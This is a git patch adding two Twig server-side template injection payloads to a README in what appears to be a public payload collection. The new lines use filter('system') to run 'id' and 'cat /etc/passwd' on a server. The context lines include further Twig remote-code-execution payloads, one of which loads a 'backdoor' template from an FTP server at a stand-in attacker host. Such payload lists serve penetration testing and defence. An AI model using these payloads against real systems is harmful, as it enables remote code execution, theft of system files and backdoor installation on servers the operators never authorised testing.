From 8b78c2fe71e7eebe7548f20eb2348c1151a870e1 Mon Sep 17 00:00:00 2001
From: SakiiR SakiiR
Date: Sun, 29 Mar 2020 23:19:27 +0200
Subject: [PATCH] Added filter(system) twig RCE

---
 Server Side Template Injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 0f780ee..9bf3241 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -157,6 +157,8 @@ $output = $twig > render (
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
 ```
 
 Example with an email passing FILTER_VALIDATE_EMAIL PHP.